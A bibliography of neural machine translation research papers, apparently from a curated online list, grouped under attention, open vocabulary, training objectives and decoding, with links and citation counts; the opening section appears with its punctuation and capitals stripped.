for neural machine translation http aclweb org anthology n18 1125 in proceedings of naacl 2018 biao zhang deyi xiong and jinsong su 2018 accelerating neural transformer via an average attention network http aclweb org anthology p18 1166 in proceedings of acl 2018 citation https scholar google com scholar cites 16436039193082710776 as sdt 2005 sciodt 0 5 hl en 5 tobias domhan 2018 how much attention do you need a granular analysis of neural machine translation architectures http aclweb org anthology p18 1167 in proceedings of acl 2018 citation https scholar google com scholar cites 16338550517026915979 as sdt 2005 sciodt 0 5 hl en 3 shaohui kuang junhui li ant nio branco weihua luo and deyi xiong 2018 attention focusing for neural machine translation by bridging source and target embeddings http aclweb org anthology p18 1164 in proceedings of acl 2018 citation https scholar google com scholar cites 13357719581808108940 as sdt 2005 sciodt 0 5 hl en 1 chaitanya malaviya pedro ferreira and andr f t martins 2018 sparse and constrained attention for neural machine translation http aclweb org anthology p18 2059 in proceedings of acl 2018 citation https scholar google com scholar cites 11257363334017043172 as sdt 2005 sciodt 0 5 hl en 4 jian li zhaopeng tu baosong yang michael r lyu and tong zhang 2018 multi head attention with disagreement regularization http aclweb org anthology d18 1317 in proceedings of emnlp 2018 citation https scholar google com scholar cites 4230613606718109837 as sdt 2005 sciodt 0 5 hl en 1 wei wu houfeng wang tianyu liu and shuming ma 2018 phrase level self attention networks for universal sentence encoding http aclweb org anthology d18 1408 in proceedings of emnlp 2018 baosong yang zhaopeng tu derek f wong fandong meng lidia s chao and tong zhang 2018 modeling localness for self attention networks https arxiv org abs 1810 10182 in proceedings of emnlp 2018 citation https scholar google com scholar cites 16651306350908112709 as sdt 2005 sciodt 0 5 
hl en 2 junyang lin xu sun xuancheng ren muyu li and qi su 2018 learning when to concentrate or divert attention self adaptive attention temperature for neural machine translation http aclweb org anthology d18 1331 in proceedings of emnlp 2018 shiv shankar siddhant garg and sunita sarawagi 2018 surprisingly easy hard attention for sequence to sequence learning http aclweb org anthology d18 1065 in proceedings of emnlp 2018 ankur bapna mia chen orhan firat yuan cao and yonghui wu 2018 training deeper neural machine translation models with transparent attention http aclweb org anthology d18 1338 in proceedings of emnlp 2018 hareesh bahuleyan lili mou olga vechtomova and pascal poupart 2018 variational attention for sequence to sequence models http aclweb org anthology c18 1142 in proceedings of coling 2018 citation https scholar google com scholar um 1 ie utf 8 lr cites 1653411252630135531 14 maha elbayad laurent besacier and jakob verbeek 2018 pervasive attention 2d convolutional neural networks for sequence to sequence prediction http aclweb org anthology k18 1010 in proceedings of conll 2018 citation https scholar google com scholar cites 14016975442337015010 as sdt 2005 sciodt 0 5 hl en 4 yuntian deng yoon kim justin chiu demi guo and alexander m rush 2018 latent alignment and variational attention https papers nips cc paper 8179 latent alignment and variational attention pdf in proceedings of neurips 2018 citation https scholar google com scholar client safari rls en oe utf 8 um 1 ie utf 8 lr cites 6335407498429393003 wenpeng yin and hinrich sch tze 2019 attentive convolution equipping cnns with rnn style attention mechanisms https arxiv org pdf 1710 00519 transactions of the association for computational linguistics shiv shankar and sunita sarawagi 2019 posterior attention models for sequence to sequence learning https openreview net pdf id bkltnhc9fx in proceedings of iclr 2019 baosong yang jian li derek wong lidia s chao xing wang and zhaopeng tu 2019 context 
aware self attention networks https arxiv org pdf 1902 05766 pdf in proceedings of aaai 2019 reza ghaeini xiaoli z fern hamed shahbazi and prasad tadepalli 2019 saliency learning teaching the model where to pay attention https arxiv org pdf 1902 08649 pdf in proceedings of naacl 2019 sameen maruf andr f t martins and gholamreza haffari 2019 selective attention for context aware neural machine translation https arxiv org pdf 1903 08788 pdf in proceedings of naacl 2019 sainbayar sukhbaatar edouard grave piotr bojanowski and armand joulin 2019 adaptive attention span in transformers https arxiv org pdf 1905 07799 in proceedings of acl 2019 kris korrel dieuwke hupkes verna dankers and elia bruni 2019 transcoding compositionally using attention to find more generalizable solutions https arxiv org pdf 1906 01234 in proceedings of acl 2019 jesse vig 2019 a multiscale visualization of attention in the transformer model https arxiv org pdf 1906 05714 in proceedings of acl 2019 sathish reddy indurthi insoo chung and sangha kim 2019 look harder a neural machine translation model with hard attention https www aclweb org anthology p19 1290 in proceedings of acl 2019 mingzhou xu derek f wong baosong yang yue zhang and lidia s chao 2019 leveraging local and global patterns for self attention networks https www aclweb org anthology p19 1295 in proceedings of acl 2019 sarthak jain and byron c wallace 2019 attention is not explanation https arxiv org pdf 1902 10186 pdf in proceedings of naacl 2019 sarah wiegreffe and yuval pinter 2019 attention is not not explanation https arxiv org pdf 1908 04626 in proceedings of emnlp 2019 xing wang zhaopeng tu longyue wang and shuming shi 2019 self attention with structural position representations https arxiv org pdf 1909 00383 in proceedings of emnlp 2019 yao hung hubert tsai shaojie bai makoto yamada louis philippe morency and ruslan salakhutdinov 2019 transformer dissection an unified understanding for transformer s attention via the lens of 
kernel https arxiv org pdf 1908 11775 in proceedings of emnlp 2019 kehai chen rui wang masao utiyama and eiichiro sumita 2019 recurrent position embedding for neural machine translation https www aclweb org anthology d19 1139 in proceedings of emnlp 2019 weiqiu you simeng sun and mohit iyyer 2020 hard coded gaussian attention for neural machine translation https arxiv org abs 2005 00742 in proceedings of acl 2020 emanuele bugliarello and naoaki okazaki 2020 enhancing machine translation with dependency aware self attention http arxiv org abs 1909 03149 in proceedings of acl 2020 yann dubois gautier dagan dieuwke hupkes elia bruni 2020 location attention for extrapolation to longer sequences https www aclweb org anthology 2020 acl main 39 in proceedings of acl 2020 michael hahn 2020 theoretical limitations of self attention in neural sequence models https transacl org ojs index php tacl article view 1815 transactions of the association for computational linguistics apoorv vyas angelos katharopoulos fran ois fleuret 2020 fast transformers with clustered attention https papers nips cc paper 2020 file f6a8dd1c954c8506aadc764cc32b895e paper pdf in proceedings of neurips 2020 chulhee yun yin wen chang srinadh bhojanapalli ankit singh rawat sashank reddi sanjiv kumar 2020 o n connections are expressive enough universal approximability of sparse transformers https papers nips cc paper 2020 file 9ed27554c893b5bad850a422c3538c15 paper pdf in proceedings of neurips 2020 yu lu1 jiali zeng jiajun zhang shuangzhi wu mu li 2021 attention calibration for transformer in neural machine translation https aclanthology org 2021 acl long 103 pdf in proceedings of acl 2021 h3 id open vocabulary open vocabulary h3 felix hill kyunghyun cho sebastien jean coline devin and yoshua bengio 2015 embedding word similarity with neural machine translation https arxiv org pdf 1412 6448 pdf in proceedings of iclr 2015 citation https scholar google com hk scholar cites 3941248209566557946 as sdt 2005 
…&sciodt=0,5&hl=en): 24)
* Thang Luong, Ilya Sutskever, Quoc Le, Oriol Vinyals, and Wojciech Zaremba. 2015. [Addressing the Rare Word Problem in Neural Machine Translation](http://aclweb.org/anthology/P15-1002). In *Proceedings of ACL 2015*. ([Citation](https://scholar.google.com.hk/scholar?cites=1855379039969159341&as_sdt=2005&sciodt=0,5&hl=en): 367)
* Sébastien Jean, Kyunghyun Cho, Roland Memisevic, and Yoshua Bengio. 2015. [On Using Very Large Target Vocabulary for Neural Machine Translation](http://www.aclweb.org/anthology/P15-1001). In *Proceedings of ACL 2015*. ([Citation](https://scholar.google.com.hk/scholar?cites=13222564911222792417&as_sdt=2005&sciodt=0,5&hl=en): 455)
* Rico Sennrich, Barry Haddow, and Alexandra Birch. 2016. [Neural Machine Translation of Rare Words with Subword Units](https://arxiv.org/pdf/1508.07909.pdf). In *Proceedings of ACL 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=1307964014330144942&as_sdt=2005&sciodt=0,5&hl=en): 795)
* Minh-Thang Luong and Christopher D. Manning. 2016. [Achieving Open Vocabulary Neural Machine Translation with Hybrid Word-Character Models](http://aclweb.org/anthology/P16-1100). In *Proceedings of ACL 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=7652846715026310814&as_sdt=2005&sciodt=0,5&hl=en): 173)
* Junyoung Chung, Kyunghyun Cho, and Yoshua Bengio. 2016. [A Character-level Decoder without Explicit Segmentation for Neural Machine Translation](http://aclweb.org/anthology/P16-1160). In *Proceedings of ACL 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=2193535701900882329&as_sdt=2005&sciodt=0,5&hl=en): 171)
* Jason Lee, Kyunghyun Cho, and Thomas Hofmann. 2017. [Fully Character-Level Neural Machine Translation without Explicit Segmentation](http://aclweb.org/anthology/Q17-1026). *Transactions of the Association for Computational Linguistics*. ([Citation](https://scholar.google.com.hk/scholar?cites=13463489320810094413&as_sdt=2005&sciodt=0,5&hl=en): 116)
* Yang Feng, Shiyue Zhang, Andi Zhang, Dong Wang, and Andrew Abel. 2017. [Memory-augmented Neural Machine Translation](http://aclweb.org/anthology/D17-1146). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=825727884820810695&as_sdt=2005&sciodt=0,5&hl=en): 9)
* Baosong Yang, Derek F. Wong, Tong Xiao, Lidia S. Chao, and Jingbo Zhu. 2017. [Towards Bidirectional Hierarchical Representations for Attention-based Neural Machine Translation](http://aclweb.org/anthology/D17-1150). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=18313642653606285813&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Peyman Passban, Qun Liu, and Andy Way. 2018. [Improving Character-Based Decoding Using Target-Side Morphological Information for Neural Machine Translation](http://aclweb.org/anthology/N18-1006). In *Proceedings of NAACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=13968879243228181963&as_sdt=2005&sciodt=0,5&hl=en): 5)
* Huadong Chen, Shujian Huang, David Chiang, Xinyu Dai, and Jiajun Chen. 2018. [Combining Character and Word Information in Neural Machine Translation Using a Multi-Level Attention](http://aclweb.org/anthology/N18-1116). In *Proceedings of NAACL 2018*.
* Frederick Liu, Han Lu, and Graham Neubig. 2018. [Handling Homographs in Neural Machine Translation](http://aclweb.org/anthology/N18-1121). In *Proceedings of NAACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=8530214186708420865&as_sdt=2005&sciodt=0,5&hl=en): 8)
* Taku Kudo. 2018. [Subword Regularization: Improving Neural Network Translation Models with Multiple Subword Candidates](http://aclweb.org/anthology/P18-1007). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=10996996628614665108&as_sdt=2005&sciodt=0,5&hl=en): 17)
* Makoto Morishita, Jun Suzuki, and Masaaki Nagata. 2018. [Improving Neural Machine Translation by Incorporating Hierarchical Subword Features](http://aclweb.org/anthology/C18-1052). In *Proceedings of COLING 2018*.
* Yang Zhao, Jiajun Zhang, Zhongjun He, Chengqing Zong, and Hua Wu. 2018. [Addressing Troublesome Words in Neural Machine Translation](http://aclweb.org/anthology/D18-1036). In *Proceedings of EMNLP 2018*.
* Colin Cherry, George Foster, Ankur Bapna, Orhan Firat, and Wolfgang Macherey. 2018. [Revisiting Character-Based Neural Machine Translation with Capacity and Compression](http://aclweb.org/anthology/D18-1461). In *Proceedings of EMNLP 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=1263295983934592415&as_sdt=2005&sciodt=0,5&hl=en): 1)
* Rebecca Knowles and Philipp Koehn. 2018. [Context and Copying in Neural Machine Translation](http://aclweb.org/anthology/D18-1339). In *Proceedings of EMNLP 2018*.
* Matthias Huck, Viktor Hangya, and Alexander Fraser. 2019. [Better OOV Translation with Bilingual Terminology Mining](https://www.aclweb.org/anthology/P19-1581). In *Proceedings of ACL 2019*.
* Changhan Wang, Kyunghyun Cho, and Jiatao Gu. 2020. [Neural Machine Translation with Byte-Level Subwords](https://arxiv.org/abs/1909.03341). In *Proceedings of AAAI 2020*.
* Duygu Ataman, Wilker Aziz, and Alexandra Birch. 2020. [A Latent Morphology Model for Open-Vocabulary Neural Machine Translation](https://openreview.net/forum?id=bjxsi1skdh). In *Proceedings of ICLR 2020*.
* Xuanli He, Gholamreza Haffari, and Mohammad Norouzi. 2020. [Dynamic Programming Encoding for Subword Segmentation in Neural Machine Translation](https://arxiv.org/abs/2005.06606). In *Proceedings of ACL 2020*.
* Yingqiang Gao, Nikola I. Nikolov, Yuhuang Hu, and Richard H.R. Hahnloser. 2020. [Character-Level Translation with Self-Attention](https://arxiv.org/abs/2004.14788). In *Proceedings of ACL 2020*.
* Ivan Provilkov, Dmitrii Emelianenko, and Elena Voita. 2020. [BPE-Dropout: Simple and Effective Subword Regularization](https://arxiv.org/abs/1910.13267). In *Proceedings of ACL 2020*.
* Jindřich Libovický and Alexander Fraser. 2020. [Towards Reasonably-Sized Character-Level Transformer NMT by Finetuning Subword Systems](https://www.aclweb.org/anthology/2020.emnlp-main.203). In *Proceedings of EMNLP 2020*.

<h3 id="training">Training Objectives and Frameworks</h3>

* Marc'Aurelio Ranzato, Sumit Chopra, Michael Auli, and Wojciech Zaremba. 2016. [Sequence Level Training with Recurrent Neural Networks](https://arxiv.org/pdf/1511.06732). In *Proceedings of ICLR 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=4877899442083611721&as_sdt=2005&sciodt=0,5&hl=en): 373)
* Minh-Thang Luong, Quoc V. Le, Ilya Sutskever, Oriol Vinyals, and Lukasz Kaiser. 2016. [Multi-task Sequence to Sequence Learning](https://arxiv.org/pdf/1511.06114). In *Proceedings of ICLR 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=6045967109711129604&as_sdt=2005&sciodt=0,5&hl=en): 282)
* Shiqi Shen, Yong Cheng, Zhongjun He, Wei He, Hua Wu, Maosong Sun, and Yang Liu. 2016. [Minimum Risk Training for Neural Machine Translation](http://aclweb.org/anthology/P16-1159). In *Proceedings of ACL 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=13568140432319924245&as_sdt=2005&sciodt=0,5&hl=en): 184)
* Sam Wiseman and Alexander M. Rush. 2016. [Sequence-to-Sequence Learning as Beam-Search Optimization](http://aclweb.org/anthology/D16-1137). In *Proceedings of EMNLP 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=8919612243620131744&as_sdt=2005&sciodt=0,5&hl=en): 141)
* Di He, Yingce Xia, Tao Qin, Liwei Wang, Nenghai Yu, Tie-Yan Liu, and Wei-Ying Ma. 2016. [Dual Learning for Machine Translation](https://papers.nips.cc/paper/6469-dual-learning-for-machine-translation.pdf). In *Proceedings of NIPS 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=15841765927830550600&as_sdt=2005&sciodt=0,5&hl=en): 138)
* Dzmitry Bahdanau, Philemon Brakel, Kelvin Xu, Anirudh Goyal, Ryan Lowe, Joelle Pineau, Aaron Courville, and Yoshua Bengio. 2017. [An Actor-Critic Algorithm for Sequence Prediction](https://arxiv.org/pdf/1607.07086). In *Proceedings of ICLR 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=5228204938243984917&as_sdt=2005&sciodt=0,5&hl=en): 167)
* Julia Kreutzer, Artem Sokolov, and Stefan Riezler. 2017. [Bandit Structured Prediction for Neural Sequence-to-Sequence Learning](http://aclweb.org/anthology/P17-1138). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com/scholar?oi=bibs&hl=en&cites=2303245646235792457,8131913197545815057): 11)
* Yingce Xia, Tao Qin, Wei Chen, Jiang Bian, Nenghai Yu, and Tie-Yan Liu. 2017. [Dual Supervised Learning](https://arxiv.org/pdf/1707.00415.pdf). In *Proceedings of ICML 2017*. ([Citation](https://scholar.google.com/scholar?um=1&ie=UTF-8&lr&cites=17907972833117899731): 29)
* Yingce Xia, Jiang Bian, Tao Qin, Nenghai Yu, and Tie-Yan Liu. 2017. [Dual Inference for Machine Learning](https://www.ijcai.org/proceedings/2017/0434.pdf). In *Proceedings of IJCAI 2017*. ([Citation](https://scholar.google.com/scholar?um=1&ie=UTF-8&lr&cites=15405750739898389436): 9)
* Di He, Hanqing Lu, Yingce Xia, Tao Qin, Liwei Wang, and Tie-Yan Liu. 2017. [Decoding with Value Networks for Neural Machine Translation](http://papers.nips.cc/paper/6622-decoding-with-value-networks-for-neural-machine-translation.pdf). In *Proceedings of NIPS 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=9924066051536654397&as_sdt=2005&sciodt=0,5&hl=en): 11)
* Sergey Edunov, Myle Ott, Michael Auli, David Grangier, and Marc'Aurelio Ranzato. 2018. [Classical Structured Prediction Losses for Sequence to Sequence Learning](http://aclweb.org/anthology/N18-1033). In *Proceedings of NAACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=7858632228846408271&as_sdt=2005&sciodt=0,5&hl=en): 20)
* Zihang Dai, Qizhe Xie, and Eduard Hovy. 2018. [From Credit Assignment to Entropy Regularization: Two New Algorithms for Neural Sequence Prediction](http://aclweb.org/anthology/P18-1155). In *Proceedings of ACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?hl=zh-CN&as_sdt=0,5&sciodt=0,5&cites=73472736706758753&scipsc=): 1)
* Zhen Yang, Wei Chen, Feng Wang, and Bo Xu. 2018. [Improving Neural Machine Translation with Conditional Sequence Generative Adversarial Nets](http://aclweb.org/anthology/N18-1122). In *Proceedings of NAACL 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=14312548252804187966&as_sdt=2005&sciodt=0,5&hl=en): 43)
* Kevin Clark, Minh-Thang Luong, Christopher D. Manning, and Quoc Le. 2018. [Semi-Supervised Sequence Modeling with Cross-View Training](http://aclweb.org/anthology/D18-1217). In *Proceedings of EMNLP 2018*.
* Lijun Wu, Fei Tian, Tao Qin, Jianhuang Lai, and Tie-Yan Liu. 2018. [A Study of Reinforcement Learning for Neural Machine Translation](http://aclweb.org/anthology/D18-1397). In *Proceedings of EMNLP 2018*. ([Citation](https://scholar.google.com.hk/scholar?cites=9706797919793848294&as_sdt=2005&sciodt=0,5&hl=en): 2)
* Semih Yavuz, Chung-Cheng Chiu, Patrick Nguyen, and Yonghui Wu. 2018. [CaLcs: Continuously Approximating Longest Common Subsequence for Sequence Level Optimization](http://aclweb.org/anthology/D18-1406). In *Proceedings of EMNLP 2018*.
* Lijun Wu, Fei Tian, Yingce Xia, Yang Fan, Tao Qin, Jianhuang Lai, and Tie-Yan Liu. 2018. [Learning to Teach with Dynamic Loss Functions](https://papers.nips.cc/paper/7882-learning-to-teach-with-dynamic-loss-functions.pdf). In *Proceedings of NeurIPS 2018*.
* Yiren Wang, Yingce Xia, Tianyu He, Fei Tian, Tao Qin, ChengXiang Zhai, and Tie-Yan Liu. 2019. [Multi-Agent Dual Learning](https://openreview.net/pdf?id=hyghn2a5tm). In *Proceedings of ICLR 2019*.
* Liqun Chen, Yizhe Zhang, Ruiyi Zhang, Chenyang Tao, Zhe Gan, Haichao Zhang, Bai Li, Dinghan Shen, Changyou Chen, and Lawrence Carin. 2019. [Improving Sequence-to-Sequence Learning via Optimal Transport](https://openreview.net/pdf?id=s1xtajr5tx). In *Proceedings of ICLR 2019*.
* Sachin Kumar and Yulia Tsvetkov. 2019. [Von Mises-Fisher Loss for Training Sequence to Sequence Models with Continuous Outputs](https://openreview.net/pdf?id=rjldnoa5y7). In *Proceedings of ICLR 2019*.
* Xing Niu, Weijia Xu, and Marine Carpuat. 2019. [Bi-Directional Differentiable Input Reconstruction for Low-Resource Neural Machine Translation](https://arxiv.org/pdf/1811.01116.pdf). In *Proceedings of NAACL 2019*.
* Weijia Xu, Xing Niu, and Marine Carpuat. 2019. [Differentiable Sampling with Flexible Reference Word Order for Neural Machine Translation](https://arxiv.org/pdf/1904.04079.pdf). In *Proceedings of NAACL 2019*.
* Inigo Jauregi Unanue, Ehsan Zare Borzeshi, Nazanin Esmaili, and Massimo Piccardi. 2019. [ReWE: Regressing Word Embeddings for Regularization of Neural Machine Translation Systems](https://arxiv.org/pdf/1904.02461.pdf). In *Proceedings of NAACL 2019*.
* Reuben Cohn-Gordon and Noah Goodman. 2019. [Lost in Machine Translation: A Method to Reduce Meaning Loss](https://arxiv.org/pdf/1902.09514.pdf). In *Proceedings of NAACL 2019*.
* Emmanouil Antonios Platanios, Otilia Stretcu, Graham Neubig, Barnabas Poczos, and Tom M. Mitchell. 2019. [Competence-based Curriculum Learning for Neural Machine Translation](https://arxiv.org/pdf/1903.09848.pdf). In *Proceedings of NAACL 2019*.
* Gaurav Kumar, George Foster, Colin Cherry, and Maxim Krikun. 2019. [Reinforcement Learning based Curriculum Optimization for Neural Machine Translation](https://arxiv.org/pdf/1903.00041.pdf). In *Proceedings of NAACL 2019*.
* Mitchell Stern, William Chan, Jamie Kiros, and Jakob Uszkoreit. 2019. [Insertion Transformer: Flexible Sequence Generation via Insertion Operations](http://proceedings.mlr.press/v97/stern19a/stern19a.pdf). In *Proceedings of ICML 2019*.
* Laura Jehl, Carolin Lawrence, and Stefan Riezler. 2019. [Learning Neural Sequence-to-Sequence Models from Weak Feedback with Bipolar Ramp Loss](https://arxiv.org/pdf/1907.03748). *Transactions of the Association for Computational Linguistics*.
* Motoki Sato, Jun Suzuki, and Shun Kiyono. 2019. [Effective Adversarial Regularization for Neural Machine Translation](https://www.aclweb.org/anthology/P19-1020). In *Proceedings of ACL 2019*.
* Kehai Chen, Rui Wang, Masao Utiyama, and Eiichiro Sumita. 2019. [Neural Machine Translation with Reordering Embeddings](https://www.aclweb.org/anthology/P19-1174). In *Proceedings of ACL 2019*.
* Bram Bulte and Arda Tezcan. 2019. [Neural Fuzzy Repair: Integrating Fuzzy Matches into Neural Machine Translation](https://www.aclweb.org/anthology/P19-1175). In *Proceedings of ACL 2019*.
* Mingming Yang, Rui Wang, Kehai Chen, Masao Utiyama, Eiichiro Sumita, Min Zhang, and Tiejun Zhao. 2019. [Sentence-Level Agreement for Neural Machine Translation](https://www.aclweb.org/anthology/P19-1296). In *Proceedings of ACL 2019*.
* Wen Zhang, Yang Feng, Fandong Meng, Di You, and Qun Liu. 2019. [Bridging the Gap between Training and Inference for Neural Machine Translation](https://www.aclweb.org/anthology/P19-1426). In *Proceedings of ACL 2019*.
* John Wieting, Taylor Berg-Kirkpatrick, Kevin Gimpel, and Graham Neubig. 2019. [Beyond BLEU: Training Neural Machine Translation with Semantic Similarity](https://www.aclweb.org/anthology/P19-1427). In *Proceedings of ACL 2019*.
* Zonghan Yang, Yong Cheng, Yang Liu, and Maosong Sun. 2019. [Reducing Word Omission Errors in Neural Machine Translation: A Contrastive Learning Approach](https://www.aclweb.org/anthology/P19-1623). In *Proceedings of ACL 2019*.
* Kyra Yee, Nathan Ng, Yann N. Dauphin, and Michael Auli. 2019. [Simple and Effective Noisy Channel Modeling for Neural Machine Translation](https://arxiv.org/pdf/1908.05731). In *Proceedings of EMNLP 2019*.
* Sarthak Garg, Stephan Peitz, Udhyakumar Nallasamy, and Matthias Paulik. 2019. [Jointly Learning to Align and Translate with Transformer Models](https://arxiv.org/pdf/1909.02074). In *Proceedings of EMNLP 2019*.
* Tianchi Bi, Hao Xiong, Zhongjun He, Hua Wu, and Haifeng Wang. 2019. [Multi-agent Learning for Neural Machine Translation](https://www.aclweb.org/anthology/D19-1079.pdf). In *Proceedings of EMNLP 2019*.
* Zaixiang Zheng, Shujian Huang, Zhaopeng Tu, Xin-Yu Dai, and Jiajun Chen. 2019. [Dynamic Past and Future for Neural Machine Translation](https://www.aclweb.org/anthology/D19-1086). In *Proceedings of EMNLP 2019*.
* Yiren Wang, Yingce Xia, Fei Tian, Fei Gao, Tao Qin, ChengXiang Zhai, and Tie-Yan Liu. 2019. [Neural Machine Translation with Soft Prototype](https://papers.nips.cc/paper/8861-neural-machine-translation-with-soft-prototype). In *Proceedings of NeurIPS 2019*.
* Mingjun Zhao, Haijiang Wu, Di Niu, and Xiaoli Wang. 2020. [Reinforced Curriculum Learning on Pre-trained Neural Machine Translation Models](https://sites.ualberta.ca/~dniu/Homepage/Publications_files/AAAI-ZhaoM.7640.pdf). In *Proceedings of AAAI 2020*.
* Yang Feng, Wanying Xie, Shuhao Gu, Chenze Shao, Wen Zhang, Zhengxin Yang, and Dong Yu. 2020. [Modeling Fluency and Faithfulness for Diverse Neural Machine Translation](https://arxiv.org/abs/1912.00178). In *Proceedings of AAAI 2020*.
* Leshem Choshen, Lior Fox, Zohar Aizenbud, and Omri Abend. 2020. [On the Weaknesses of Reinforcement Learning for Neural Machine Translation](https://openreview.net/forum?id=h1ecw3ekvh). In *Proceedings of ICLR 2020*.
* Zaixiang Zheng, Hao Zhou, Shujian Huang, Lei Li, Xin-Yu Dai, and Jiajun Chen. 2020. [Mirror-Generative Neural Machine Translation](https://openreview.net/forum?id=hkxqrtnyph). In *Proceedings of ICLR 2020*.
* Angela Fan, Edouard Grave, and Armand Joulin. 2020. [Reducing Transformer Depth on Demand with Structured Dropout](https://openreview.net/forum?id=sylo2ystdr). In *Proceedings of ICLR 2020*.
* Yikai Zhou, Baosong Yang, Derek F. Wong, Yu Wan, and Lidia S. Chao. 2020. [Uncertainty-Aware Curriculum Learning for Neural Machine Translation](https://arxiv.org/abs/1903.09848). In *Proceedings of ACL 2020*.
* Hongfei Xu, Josef van Genabith, Deyi Xiong, and Qiuhui Liu. 2020. [Dynamically Adjusting Transformer Batch Size by Monitoring Gradient Direction Change](https://arxiv.org/abs/2005.02008). In *Proceedings of ACL 2020*.
* Hongfei Xu, Qiuhui Liu, Josef van Genabith, Deyi Xiong, and Jingyi Zhang. 2020. [Lipschitz Constrained Parameter Initialization for Deep Transformers](https://arxiv.org/abs/1911.03179). In *Proceedings of ACL 2020*.
* Xintong Li, Lemao Liu, Rui Wang, Guoping Huang, and Max Meng. 2020. [Regularized Context Gates on Transformer for Machine Translation](https://arxiv.org/abs/1908.11020). In *Proceedings of ACL 2020*.
* Sheng Shen, Zhewei Yao, Amir Gholami, Michael Mahoney, and Kurt Keutzer. 2020. [Rethinking Batch Normalization in Transformers](https://arxiv.org/abs/2003.07845). In *Proceedings of ICML 2020*.
* Xuebo Liu, Houtim Lai, Derek F. Wong, and Lidia S. Chao. 2020. [Norm-Based Curriculum Learning for Neural Machine Translation](https://www.aclweb.org/anthology/2020.acl-main.41). In *Proceedings of ACL 2020*.
* Rongxiang Weng, Heng Yu, Xiangpeng Wei, and Weihua Luo. 2020. [Towards Enhancing Faithfulness for Neural Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.212). In *Proceedings of EMNLP 2020*.
* Yu Wan, Baosong Yang, Derek F. Wong, Yikai Zhou, Lidia S. Chao, Haibo Zhang, and Boxing Chen. 2020. [Self-Paced Learning for Neural Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.80). In *Proceedings of EMNLP 2020*.
* Wenxiang Jiao, Xing Wang, Shilin He, Irwin King, Michael Lyu, and Zhaopeng Tu. 2020. [Data Rejuvenation: Exploiting Inactive Training Examples for Neural Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.176). In *Proceedings of EMNLP 2020*.
* Shuhao Gu, Jinchao Zhang, Fandong Meng, Yang Feng, Wanying Xie, Jie Zhou, and Dong Yu. 2020. [Token-level Adaptive Training for Neural Machine Translation](https://www.aclweb.org/anthology/2020.emnlp-main.76). In *Proceedings of EMNLP 2020*.
* Xiao Pan, Mingxuan Wang, Liwei Wu, and Lei Li. 2021. [Contrastive Learning for Many-to-many Multilingual Neural Machine Translation](https://aclanthology.org/2021.acl-long.21). In *Proceedings of ACL 2021*.
* Zehui Lin, Liwei Wu, Mingxuan Wang, and Lei Li. 2021. [Learning Language Specific Sub-network for Multilingual Machine Translation](https://aclanthology.org/2021.acl-long.25.pdf). In *Proceedings of ACL 2021*.

<h3 id="decoding">Decoding</h3>

* Mingxuan Wang, Zhengdong Lu, Hang Li, and Qun Liu. 2016. [Memory-enhanced Decoder for Neural Machine Translation](http://aclweb.org/anthology/D16-1027). In *Proceedings of EMNLP 2016*. ([Citation](https://scholar.google.com.hk/scholar?cites=8953099567327192144&as_sdt=5,43&sciodt=0,43&hl=en): 30)
* Shonosuke Ishiwatari, Jingtao Yao, Shujie Liu, Mu Li, Ming Zhou, Naoki Yoshinaga, Masaru Kitsuregawa, and Weijia Jia. 2017. [Chunk-based Decoder for Neural Machine Translation](http://aclweb.org/anthology/P17-1174). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=12622466792413888553&as_sdt=5,43&sciodt=0,43&hl=en): 4)
* Hao Zhou, Zhaopeng Tu, Shujian Huang, Xiaohua Liu, Hang Li, and Jiajun Chen. 2017. [Chunk-Based Bi-Scale Decoder for Neural Machine Translation](http://aclweb.org/anthology/P17-2092). In *Proceedings of ACL 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=15037334213705032139&as_sdt=5,43&sciodt=0,43&hl=en): 6)
* Zichao Yang, Zhiting Hu, Yuntian Deng, Chris Dyer, and Alex Smola. 2017. [Neural Machine Translation with Recurrent Attention Modeling](http://aclweb.org/anthology/E17-2061). In *Proceedings of EACL 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=5621977008323303060&as_sdt=5,43&sciodt=0,43&hl=en): 25)
* Markus Freitag and Yaser Al-Onaizan. 2017. [Beam Search Strategies for Neural Machine Translation](http://aclweb.org/anthology/W17-3207). In *Proceedings of the First Workshop on Neural Machine Translation*. ([Citation](https://scholar.google.com.hk/scholar?cites=9963996198070293328&as_sdt=5,43&sciodt=0,43&hl=en): 14)
* Rajen Chatterjee, Matteo Negri, Marco Turchi, Marcello Federico, Lucia Specia, and Frédéric Blain. 2017. [Guiding Neural Machine Translation Decoding with External Knowledge](http://aclweb.org/anthology/W17-4716). In *Proceedings of the Second Conference on Machine Translation*. ([Citation](https://scholar.google.com.hk/scholar?cites=16027327382881304751&as_sdt=5,43&sciodt=0,43&hl=en): 8)
* Cong Duy Vu Hoang, Gholamreza Haffari, and Trevor Cohn. 2017. [Towards Decoding as Continuous Optimisation in Neural Machine Translation](http://aclweb.org/anthology/D17-1014). In *Proceedings of EMNLP 2017*. ([Citation](https://scholar.google.com.hk/scholar?cites=3256665477810901088&as_sdt=5,43&sciodt=0,43&hl=en): 4)
